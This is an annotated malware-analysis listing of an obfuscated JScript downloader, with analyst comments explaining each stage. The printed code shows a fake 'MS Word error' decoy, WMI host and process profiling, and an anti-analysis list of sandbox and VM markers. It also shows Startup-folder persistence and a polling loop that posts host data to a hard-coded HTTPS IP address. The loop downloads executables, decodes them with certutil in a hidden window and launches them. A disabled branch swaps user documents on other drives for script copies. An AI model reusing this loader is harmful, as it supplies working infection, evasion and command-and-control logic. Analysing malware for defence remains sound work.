// Analyst notes: flags, constants and COM handles of an obfuscated Windows Script Host
// (JScript) downloader. Identifier names are randomised; the roles noted below are taken
// from how each name is used further down in this listing.
// NOTE(review): the leading "- " on every line looks like list markup from the paste
// page rather than script text - confirm against the raw sample.
- var mdEAithey85 = true; // when true, the decoy Popup is shown after the script reads its own first line
- var mdEAibusy41 = true; // one of the conditions checked before the Startup copy is written
- var mdEAitime62 = false; // gates the drive-listing / file-replacement branch; false here, so that branch never runs
- var mdEAiopinions92 = 0; // accumulator for the host hash later sent as the "p" query value
- var mdEAiachieve86 = 0; // loop index for the hash, then reused as the "k" query value (10 or 20)
- var mdEAiwithout49 = false; // set to true once the script has read its own first line
- var mdEAiitself10 = 3; // option id passed to ServerXMLHTTP setOption together with "MSXML"
- var mdEAiresolvedto17 = null; // text stream: self-read, later the base64 temp file
- var mdEAithrough13 = null; // text stream used to write the Startup copy
- var mdEAivisit40 = null; // holds responseText of the HTTP reply
- var mdEAiwith35 = null; // text stream used to read the first bytes of the downloaded file
- var mdEAiconsidered87 = null; // text stream over the document listing file
- var mdEAiinto43 = null; // first line of the running script file
- var mdEAidisproportionate79 = 0; // counter that caps the WMI enumerations
- var mdEAiespecially5 = false; // set to true when an analysis-environment check matches
- var mdEAiability89 = -1; // compared with indexOf results (-1 = not found); reused as a mode value in the download loop
- var mdEAidefences47 = 7; // constant truthy condition of the inner polling loop
- var mdEAistudy74 = 1; // Popup type argument; also the always-truthy outer loop condition
- var mdEAiwere19 = "[!]"; // decoy dialog title
- var mdEAithat49 = "MS Word error: 0x0030EF65"; // decoy dialog text shown to the user
- var mdEAiThis30 = this["WScript"]; // WSH host object, reached by string key
- var mdEAilabour79 = this["ActiveXObject"]; // COM constructor, reached by string key
- var mdEAileaders26 = mdEAiThis30["ScriptFullName"]; // full path of the running script
- var mdEAicheap26 = new mdEAilabour79("Scripting.FileSystemObject"); // file system access
- var mdEAimore40 = mdEAiThis30["CreateObject"]("WScript.Shell"); // used for Popup and ExpandEnvironmentStrings
// First-run step. When the script path does not contain the Startup folder component,
// the script opens its own file (mode 1 = read), keeps the first line for the later
// Startup copy, and shows a fake "MS Word error" dialog (30 second timeout) as a decoy.
// NOTE(review): "\" here and elsewhere in the listing looks like "\\" that lost a
// backslash when the page was rendered; as printed the line does not parse.
- try {
- if (mdEAileaders26["indexOf"]("\" + "Startup" + "\") == -1) {
- mdEAiresolvedto17 = mdEAicheap26["OpenTextFile"](mdEAileaders26, 1, false, 0);
- mdEAiinto43 = mdEAiresolvedto17["ReadLine"]();
- mdEAiresolvedto17["Close"]();
- mdEAiwithout49 = true;
- if (mdEAithey85) {
- mdEAimore40["Popup"](unescape(mdEAithat49), 30, unescape(mdEAiwere19), mdEAistudy74);
- }
- }
- } catch (Njmsqad) {
// Any failure above still produces the decoy dialog, with a 6 second timeout.
- mdEAimore40["Popup"](mdEAithat49, 6, mdEAiwere19, mdEAistudy74);
- }
// Main body: a counting loop that delays the real work, followed by host profiling,
// analysis-environment checks, Startup persistence and an endless download/execute loop.
// Artefacts visible in this listing that a defender can hunt for:
//   - HTTPS POST of the OS/process inventory to the hard-coded URL assembled below
//   - the response header name "RedSparrow"
//   - shell.jse in the user's Startup folder
//   - %TEMP%\<digits>.exe and %TEMP%\<digits>.cro, and %TEMP%\ascii.txt
//   - certutil started with "-f -decode" and a hidden window by the script host
- var mdEAireason4 = 1;
- var mdEAithey86 = ("2090000") * 1;
// The outer loop never ends on its own; it only counts up to 2090000 before the payload
// logic runs once. The string assignment inside the loop has no visible effect.
- while (mdEAistudy74) {
- mdEAithat49 = "ac";
- mdEAireason4 = mdEAireason4 + 1;
- if (mdEAireason4 == mdEAithey86) {
// Script-host globals and COM objects: Enumerator, GetObject (WMI), Shell.Application,
// ADODB.Stream (binary file write) and Msxml2.ServerXMLHTTP (network).
- var mdEAiquiet2 = this["Enumerator"];
- var mdEAiknew41 = this["GetObject"];
- var mdEAiwere47 = new mdEAilabour79("Shell.Application");
- var mdEAiyounger30 = new mdEAilabour79("ADODB.Stream");
- var mdEAimotives13 = new mdEAilabour79("Msxml2.ServerXMLHTTP");
- var mdEAisufficient11 = mdEAimore40["ExpandEnvironmentStrings"]("%USERPROFILE%");
- var mdEAiacted13 = String["fromCharCode"](34); // double-quote character used to wrap paths
- var mdEAiquestion47 = Math["floor"]((Math["random"]() * (900)) + 1); // not referenced again in this listing
- var mdEAithose44 = mdEAimore40["ExpandEnvironmentStrings"]("%TEMP%");
- var mdEAiskilled63 = "\" + "shell.jse";
// NameSpace(7) is the shell's Startup special folder; the persistence path is that folder plus shell.jse.
- var mdEAirecall6 = mdEAiwere47["NameSpace"](7);
- var mdEAicarefully66 = mdEAirecall6["Self"]["Path"] + mdEAiskilled63;
- var mdEAiobjectively96 = mdEAicarefully66 + mdEAithose44; // seed string for the host hash
// Hard-coded command-and-control endpoint and its fixed query parameters.
- var mdEAimore39 = "&sin=tamud";
- var mdEAipeople52 = "https://185.159.82.20/t-34/x644.php";
- var mdEAiapostles32 = "?min=fr";
- var mdEAicentre32 = mdEAipeople52 + mdEAiapostles32;
- var mdEAithat11 = mdEAicheap26["Drives"];
// Document file patterns used only by the branch gated on mdEAitime62.
- var mdEAiimpressions49 = "*.doc *.xls *.pdf *.rtf *.txt *.pub *.odt *.ods *.odp *.odm *.odc *.odb";
- var mdEAiwrong86 = '';
- var mdEAitheir20 = "ascii.txt";
- var mdEAiexcuse39 = null;
- var mdEAiexistence6 = mdEAiopinions92;
- var mdEAithing92 = null;
- var mdEAithat60 = null;
- var mdEAipaid22 = mdEAiopinions92;
- var mdEAihonest33 = '';
- var mdEAishall49 = '';
- var mdEAiexistence62 = null;
- var mdEAibeing97 = '';
- var mdEAiSuch36 = '';
- var mdEAitheoretical52 = '';
- var mdEAirenunciation97 = null;
- var mdEAithis15 = null;
- var mdEAionly63 = ("4294967295") * 1; // 0xFFFFFFFF mask applied to the hash
- var mdEAiwere92 = "-f -decode "; // certutil arguments
- var mdEAiground81 = "MZ"; // expected first two characters of the downloaded file
- var mdEAiexpectation22 = "POST";
- var mdEAimidst53 = '';
- var mdEAiproved2 = 0; // status code sent as the "i" query value on the next request
// Host profiling through WMI (root\cimv2): OS caption and version (at most 5 rows), then
// up to 200 running processes as "Name*ExecutablePath" lines. Errors are swallowed.
- try {
- mdEAithing92 = mdEAiknew41("winmgmts:{impersonationLevel=impersonate}!" + "\" + "\" + "." + "\" + "root" + "\" + "cimv2");
- mdEAiexistence6 = new mdEAiquiet2(mdEAithing92["ExecQuery"]("Select * from Win32_Process"));
- mdEAiexistence62 = new mdEAiquiet2(mdEAithing92["ExecQuery"]("Select * from Win32_OperatingSystem"));
- while (!mdEAiexistence62["atEnd"]()) {
- if (mdEAidisproportionate79 == 5) break;
- mdEAishall49 = mdEAishall49 + mdEAiexistence62["item"]()["Caption"] + mdEAiexistence62["item"]()["Version"];
- mdEAidisproportionate79++;
- mdEAiexistence62["moveNext"]();
- }
// The Startup path (which carries the profile path) is appended to the OS string after a CR LF.
- mdEAishall49 = mdEAishall49 + String["fromCharCode"](13) + String["fromCharCode"](10) + mdEAicarefully66;
- mdEAidisproportionate79 = 0;
- while (!mdEAiexistence6["atEnd"]()) {
- if (mdEAidisproportionate79 == 200) break;
- mdEAithat60 = mdEAiexistence6["item"]();
- mdEAihonest33 = mdEAihonest33 + mdEAithat60["Name"] + "*" + mdEAithat60["ExecutablePath"] + String["fromCharCode"](13) + String["fromCharCode"](10);
- mdEAidisproportionate79++;
- mdEAiexistence6["moveNext"]();
- }
- } catch (Njmsqad) {}
// Host identifier: a multiply-by-31 string hash ((h << 5) - h + charCode) over the Startup
// path, %TEMP% and the OS string. "k" becomes 10 when the Startup path lacks an AppData
// component and 20 otherwise. If hashing fails the identifier falls back to 7777777.
- try {
- mdEAiobjectively96 = mdEAiobjectively96 + mdEAishall49;
- for (mdEAiachieve86 = 0; mdEAiachieve86 < mdEAiobjectively96["length"]; mdEAiachieve86++) {
- mdEAiopinions92 = (((mdEAiopinions92 << (5)) - mdEAiopinions92) + mdEAiobjectively96["charCodeAt"](mdEAiachieve86)) & mdEAionly63;
- }
- if (mdEAicarefully66["indexOf"]("\" + "AppData" + "\") == -1) {
- mdEAiachieve86 = 5 + 5;
- } else {
- mdEAiachieve86 = 20;
- }
- } catch (Njmsqad) {
- mdEAiopinions92 = 7777777;
- }
// Report body = OS string, CR LF, process list.
- mdEAihonest33 = mdEAishall49 + String["fromCharCode"](13) + String["fromCharCode"](10) + mdEAihonest33;
// Analysis-environment check: the script gives up when the report is shorter than 1400
// characters or contains any listed marker (monitoring and debugging tools, virtual machine
// guest services, specific user, host and path names). mdEAiability89 is -1 at this point,
// so "!= mdEAiability89" means "substring found".
// NOTE(review): `view` is never declared in this listing and the call sits outside any
// try block, so it presumably raises an error that ends the script - confirm.
- if (mdEAihonest33["length"] < 1400 || mdEAihonest33["indexOf"]("2B.exe") != mdEAiability89 || mdEAihonest33["indexOf"]("Procmon") != mdEAiability89 || mdEAihonest33["indexOf"]("Wireshark") != mdEAiability89 || mdEAihonest33["indexOf"]("Temp" + "\" + "iexplore.exe") != mdEAiability89 || mdEAihonest33["indexOf"]("ProcessHacker") != mdEAiability89 || mdEAihonest33["indexOf"]("vmtoolsd") != mdEAiability89 || mdEAihonest33["indexOf"]("VBoxService") != mdEAiability89 || mdEAihonest33["indexOf"]("python") != mdEAiability89 || mdEAihonest33["indexOf"]("Proxifier.exe") != mdEAiability89 || mdEAihonest33["indexOf"]("Johnson") != mdEAiability89 || mdEAihonest33["indexOf"]("ImmunityDebugger.exe") != mdEAiability89 || mdEAihonest33["indexOf"]("lordPE.exe") != mdEAiability89 || mdEAihonest33["indexOf"]("ctfmon.exe*JOHN-PC") != mdEAiability89 || mdEAihonest33["indexOf"]("BehaviorDumper") != mdEAiability89 || mdEAihonest33["indexOf"]("anti-virus.EXE") != mdEAiability89 || mdEAihonest33["indexOf"]("AgentSimulator.exe") != mdEAiability89 || mdEAihonest33["indexOf"]("VzService.exe") != mdEAiability89 || mdEAihonest33["indexOf"]("VBoxTray.exe") != mdEAiability89 || mdEAihonest33["indexOf"]("VmRemoteGuest") != mdEAiability89 || mdEAihonest33["indexOf"]("SystemIT|admin") != mdEAiability89 || mdEAihonest33["indexOf"]("WIN7-TRAPS") != mdEAiability89 || mdEAihonest33["indexOf"]("Emily" + "\" + "AppData") != mdEAiability89 || mdEAihonest33["indexOf"]("PROCMON") != mdEAiability89 || mdEAihonest33["indexOf"]("procexp") != mdEAiability89 || mdEAihonest33["indexOf"]("tcpdump") != mdEAiability89 || mdEAihonest33["indexOf"]("FrzState2k") != mdEAiability89 || mdEAihonest33["indexOf"]("DFLocker64") != mdEAiability89 || mdEAihonest33["indexOf"]("vmware") != mdEAiability89 || mdEAihonest33["indexOf"]("LOGSystem.Agent.Service.exe") != mdEAiability89 || mdEAihonest33["indexOf"]("C:" + "\" + "Users" + "\" + "user" + "\") != mdEAiability89 || mdEAihonest33["indexOf"]("C:" + "\" + "Users" + "\" + 
"milozs" + "\") != mdEAiability89 || mdEAihonest33["indexOf"]("windanr.exe") != mdEAiability89 || mdEAihonest33["indexOf"]("gemu-ga.exe") != mdEAiability89 || mdEAihonest33["indexOf"]("HAPUBWS") != mdEAiability89 || mdEAihonest33["indexOf"]("BennyDB.exe") != mdEAiability89 || mdEAihonest33["indexOf"]("Peter Wilson") != mdEAiability89 || mdEAihonest33["indexOf"]("Hong Lee") != mdEAiability89) {
- mdEAiespecially5 = true;
- view["close"]("we_need_to_go_deeper");
- }
// Persistence: when the script was not started from the Startup folder, its first line is
// written to <Startup>\shell.jse (overwrite, non-Unicode). Write errors are swallowed.
- try {
- if (mdEAiwithout49 && mdEAibusy41 && !mdEAiespecially5) {
- mdEAithrough13 = mdEAicheap26["CreateTextFile"](mdEAicarefully66, true, false);
- mdEAithrough13["WriteLine"](mdEAiinto43);
- mdEAithrough13["Close"]();
- }
- } catch (Njmsqad) {}
// Endless polling loop; each pass picks fresh random names for the .exe and .cro files in %TEMP%.
- while (mdEAidefences47) {
- try {
- mdEAimidst53 = mdEAithose44 + "\" + Math["floor"]((Math["random"]() * (999)) + 1) + Math["floor"]((Math["random"]() * (999)) + 1) + ".exe";
- mdEAiwrong86 = mdEAithose44 + "\" + Math["floor"]((Math["random"]() * (999)) + 1) + Math["floor"]((Math["random"]() * (999)) + 1) + ".cro";
// NOTE(review): option 3 looks like the ServerXMLHTTP client-certificate selector - confirm.
- mdEAimotives13["setOption"](mdEAiitself10, "MSXML");
// Request URL: fixed parameters plus p = absolute host hash, i = previous status code,
// k = 10 or 20, r = random digits. The inventory is the POST body; the call is synchronous.
- mdEAiexcuse39 = mdEAicentre32 + mdEAimore39 + "&p=" + Math["abs"](mdEAiopinions92) + "&i=" + mdEAiproved2 + "&k=" + mdEAiachieve86 + "&r=" + Math["floor"]((Math["random"]() * (999)) + 1) + Math["floor"]((Math["random"]() * (999)) + 1) + Math["floor"]((Math["random"]() * (999)) + 1);
- mdEAimotives13["open"](mdEAiexpectation22, mdEAiexcuse39, false);
- mdEAimotives13["send"](mdEAihonest33);
- if (mdEAimotives13["status"] == 200) {
- if (mdEAiproved2 == 0) {
- mdEAivisit40 = mdEAimotives13["responseText"];
// A "RedSparrow: 0" response header redirects the download onto the Startup script path
// and switches the mode value to 0, which suppresses execution further down.
- try {
- if (mdEAimotives13["getResponseHeader"]("RedSparrow") == '0') {
- mdEAimidst53 = mdEAicarefully66;
- mdEAiability89 = 0;
- }
- } catch (Njmsqad) {}
// Two delivery paths: a binary body is written directly with ADODB.Stream (SaveToFile
// mode 2 = overwrite); otherwise a text body longer than 10 characters is saved as the .cro
// file and decoded into the target path by certutil, started with a hidden window.
- try {
- if (mdEAimotives13["getResponseHeader"]("Content-Transfer-Encoding") == "binary") {
- mdEAiyounger30["Open"]();
- mdEAiyounger30["Type"] = 1;
- mdEAiyounger30["Write"](mdEAimotives13["responseBody"]);
- mdEAiyounger30["Position"] = 0;
- mdEAiyounger30["SaveToFile"](mdEAimidst53, 2);
- mdEAiyounger30["Close"]();
- } else {
- if (mdEAivisit40.length > 10) {
- mdEAiresolvedto17 = mdEAicheap26["CreateTextFile"](mdEAiwrong86, true, false);
- mdEAiresolvedto17["WriteLine"](mdEAivisit40);
- mdEAiresolvedto17["Close"]();
- mdEAiThis30["Sleep"](7000);
- mdEAiwere47["ShellExecute"]("certutil", mdEAiwere92 + mdEAiwrong86 + " " + mdEAiacted13 + mdEAimidst53 + mdEAiacted13, '', "open", 0);
- }
- }
- } catch (Njmsqad) {}
- } else {
// A non-zero status code has just been reported; this reply's body is ignored and the code is reset.
- mdEAiproved2 = 0;
- continue;
- }
// Mode 0 (set by the RedSparrow header): wait 50 s, restore the mode to -1 and report code 9 next.
- if (mdEAiability89 == 0) {
- mdEAiThis30["Sleep"](50000);
- mdEAiability89 = -1;
- mdEAiproved2 = 9;
- continue;
- }
- mdEAiThis30["Sleep"](33000);
// Branch disabled in this sample because mdEAitime62 is false. If it were enabled and no
// file had been written, it would list the document patterns on ready drives other than the
// profile drive into %TEMP%\ascii.txt (FileSystemObject DriveType 1 = removable, 3 = network -
// confirm), then, per listed file, copy the Startup script to the same name with a .jse
// extension and delete the original document.
- if (!mdEAicheap26["FileExists"](mdEAimidst53) && mdEAitime62) {
- try {
- mdEAirenunciation97 = new mdEAiquiet2(mdEAithat11);
- for (; !mdEAirenunciation97["atEnd"](); mdEAirenunciation97["moveNext"]()) {
- mdEAithis15 = mdEAirenunciation97["item"]();
- if ((mdEAithis15["IsReady"] && (mdEAithis15["DriveType"] == 3 || mdEAithis15["DriveType"] == 1)) && mdEAisufficient11["substring"](0, 1) != mdEAithis15["DriveLetter"]) {
- mdEAiwere47["ShellExecute"]("cmd", "/U /Q /C cd /D " + mdEAithis15["DriveLetter"] + ": && dir /b/s/x " + mdEAiimpressions49 + ">>%TEMP%" + "\" + mdEAitheir20, '', "open", 0);
- mdEAiThis30["Sleep"](60000);
- }
- }
- mdEAiThis30["Sleep"](50000);
- mdEAiconsidered87 = mdEAicheap26["GetFile"](mdEAithose44 + "\" + mdEAitheir20)["OpenAsTextStream"](1, -1);
- while (!mdEAiconsidered87["AtEndOfStream"]) {
- mdEAiSuch36 = mdEAiconsidered87["ReadLine"]();
- mdEAitheoretical52 = mdEAiSuch36["substring"](0, mdEAiSuch36["indexOf"]("."));
- mdEAiwere47["ShellExecute"]("cmd", "/U /Q /C copy /Y " + mdEAiacted13 + mdEAicarefully66 + mdEAiacted13 + " " + mdEAiacted13 + mdEAitheoretical52 + ".jse" + mdEAiacted13 + " && del /Q/F " + mdEAiacted13 + mdEAiSuch36 + mdEAiacted13, '', "open", 0);
- }
- mdEAiconsidered87["Close"]();
- mdEAicheap26["DeleteFile"](mdEAithose44 + "\" + mdEAitheir20);
- } catch (Njmsqad) {}
- mdEAiproved2 = 0;
- continue;
- }
// Header check on the written file: GetFile throws when the file is missing, which the
// outer catch swallows. Only a file starting with "MZ" is acted on.
- mdEAiwith35 = mdEAicheap26["GetFile"](mdEAimidst53)["OpenAsTextStream"](1);
- mdEAibeing97 = mdEAiwith35["ReadLine"]()["substring"](0, 2);
- mdEAiwith35["Close"]();
- if (mdEAibeing97 == mdEAiground81 && mdEAiproved2 == 0) {
// Mode -1 launches the downloaded file through ShellExecute and records code 59; the other
// modes only record a code (60-62). A launch error records 9888. The code goes out as "i"
// on the next request.
- try {
- switch (mdEAiability89) {
- case -1:
- mdEAiwere47["ShellExecute"](mdEAimidst53, null, '', "open", 1);
- mdEAiproved2 = 59;
- break;
- case 0:
- mdEAiproved2 = 60;
- break;
- case 1:
- mdEAiproved2 = 61;
- break;
- case 2:
- mdEAiproved2 = 62;
- break;
- }
- } catch (Njmsqad) {
- mdEAiproved2 = 9888;
- }
- mdEAiThis30["Sleep"](9000);
- }
- }
- } catch (Njmsqad) {}
// 50 second pause between polling passes that reach the end of the loop body.
- mdEAiThis30["Sleep"](50000);
- };
- };
- };